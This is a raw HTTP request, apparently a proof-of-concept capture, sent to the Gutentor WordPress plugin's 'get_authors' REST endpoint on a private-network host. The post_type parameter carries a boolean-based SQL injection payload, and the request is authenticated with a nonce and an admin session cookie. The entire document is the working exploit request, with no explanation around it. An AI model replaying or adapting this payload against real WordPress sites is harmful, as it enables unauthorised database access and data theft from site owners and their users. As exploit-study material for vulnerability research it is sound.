GET /wp-json/gutentor-self-api/v1/get_authors?post_type=post'+AND+'1'='2 HTTP/1.1
Host: 192.168.128.129:8080
Accept: application/json, */*;q=0.1
X-WP-Nonce: 7da21a3714
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Referer: http://192.168.128.129:8080/wp-admin/post-new.php?post_type=post
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_ad103584e99177050ac05344f99dca2f=admin%7C1739928038%7CEnfJyq0I2ubg4pzw99X2802egQKQhsGvMh8Xoo0A0ee%7Caac491ec7a3551f3b6cf6fe951184b916f34ad9f8bad9678e652ec00244b71a0; wp-settings-time-1=1739755238; wp-settings-1=mfold%3Do
Connection: close

